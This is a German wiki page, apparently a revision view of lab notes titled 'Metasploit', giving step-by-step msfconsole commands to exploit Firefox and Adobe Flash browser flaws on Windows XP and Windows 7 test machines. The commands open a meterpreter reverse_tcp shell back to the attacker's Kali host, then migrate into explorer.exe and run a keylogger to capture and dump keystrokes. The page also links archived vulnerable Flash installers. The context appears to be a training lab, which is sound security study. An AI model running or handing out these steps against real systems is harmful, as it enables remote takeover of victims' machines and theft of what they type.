Metasploit: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
David (Diskussion | Beiträge) |
Thomas (Diskussion | Beiträge) |
||
| Zeile 57: | Zeile 57: | ||
TeamViewer ID 597 708 786 | TeamViewer ID 597 708 786 | ||
| − | + | ==Hackersystem== | |
| + | kali linux | ||
| − | + | ip 192.168.244.50 | |
| − | + | ===auf der konsole=== | |
| − | + | metasploit konsole starten | |
| − | * | + | *msfconsole |
| − | + | auswahl des exploits | |
| − | + | *use exploit/windows/browser/adobe_flash_domain_memory_uaf | |
| − | + | rüberschiebes der schadsoftware | |
| − | + | *set payload windows/meterpreter/reverse_tcp | |
| − | + | setzen des localhost | |
| − | + | *set lhost 192.168.244.50 | |
| − | + | setzen des webservers | |
| − | + | *set srvhost 192.168.244.50 | |
| + | pfad zum hack | ||
| + | *set uripath /hack | ||
| + | ausführen des exploits | ||
| + | *exploit | ||
*gehen mit win7 auf http://192.168.247.111:8080/hack | *gehen mit win7 auf http://192.168.247.111:8080/hack | ||
Version vom 20. Oktober 2015, 10:04 Uhr
Links
- http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-shellshock-vulnerability-0157651/
- http://www.explorehacking.com/2011/03/metasploit-tutorial-with-example.html
- https://jonathansblog.co.uk/metasploit-tutorial-for-beginners
- https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
- http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE
- http://www.metasploit.com/
Setup Opfer
Winxp Service pack 3 Firefox 3.5
Setup Hacker
Kali Linux ip: 192.168.242.53
vorgehen
starte metasploit
msfconsole
use exploit/multi/browser/firefox_escape_retval set payload windows/meterpreter/reverse_tcp/ set lhost 192.168.242.53 (lokaler Host) set svrhost 192.168.242.53 (HTTP-Server IP) set svrport 8888 (HTTP-Server Port) set lport 4444 (lokaler Port) set uripath /hack (optional) exploit
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack wenn wir meterpreter > sehen hat der exploit funktioniert
session - i 1 (in die session gehen) sessions -h (zeigt optionen) ps (zeigt prozesse) migrate PSID (verschiebt in den prozess Z.b explorer.exe) getpid (zeigt momentanen prozess) keyscan_start (startet den keyloger) keyscan_dump (zeigt aufzeichnungen) keyscan_stop (stopt keyloger)
https://fpdownload.macromedia.com/pub/flashplayer/installers/archive/fp_18.0.0.203_archive.zip
https://fpdownload.macromedia.com/pub/flashplayer/installers/archive/fp_17.0.0.134_archive.zip
Win7 32bit Exploit
- Setup Opfer
win732 bit
adobeflash 17.0.0.134
firefox
TeamViewer ID 597 708 786
Hackersystem
kali linux
ip 192.168.244.50
auf der konsole
metasploit konsole starten
- msfconsole
auswahl des exploits
- use exploit/windows/browser/adobe_flash_domain_memory_uaf
rüberschiebes der schadsoftware
- set payload windows/meterpreter/reverse_tcp
setzen des localhost
- set lhost 192.168.244.50
setzen des webservers
- set srvhost 192.168.244.50
pfad zum hack
- set uripath /hack
ausführen des exploits
- exploit
- gehen mit win7 auf http://192.168.247.111:8080/hack
sessions - i 1 (in die session gehen) sessions -h (zeigt optionen) ps (zeigt prozesse) migrate PSID (verschiebt in den prozess Z.b explorer.exe) getpid (zeigt momentanen prozess) keyscan_start (startet den keyloger) keyscan_dump (zeigt aufzeichnungen) keyscan_stop (stopt keyloger)